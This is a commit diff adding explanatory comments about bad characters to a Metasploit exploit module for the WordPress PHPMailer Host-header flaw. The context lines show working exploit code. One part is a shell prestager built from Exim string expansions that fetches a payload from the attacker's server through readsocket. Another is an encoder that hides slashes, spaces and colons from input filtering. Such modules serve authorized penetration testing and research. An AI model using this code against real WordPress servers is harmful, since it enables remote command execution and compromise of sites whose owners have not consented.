Add some comments about badchars

modules/exploits/unix/webapp/wp_phpmailer_host_header.rb

@@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
+    # Since everything goes through strtolower(), we need lowercase
     print_status("Generating #{cmdstager_flavor} command stager")
     @cmdstager = generate_cmdstager(
       'Path'   => "/#{Rex::Text.rand_text_alpha_lower(8)}",
@@ -99,6 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     prestager = []
 
     # This is basically sh -c `wget` implemented using Exim string expansions
+    # Badchars we can't encode away: \ for \n (newline) and : outside strings
     prestager << "/bin/sh -c ${reduce{get #{get_resource} http/1.0}" \
       '{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket' \
       "{inet:#{srvhost_addr}:#{srvport}}{$item$value$value}}}}}}"
@@ -132,6 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
     exim_payload << " #{Rex::Text.rand_text_alpha(8)})"
   end
 
+  # We can encode away the following badchars using string expansions
   def encode_exim_payload(command)
     command.gsub(/[\/ :]/,
       '/' => '${substr{0}{1}{$spool_directory}}',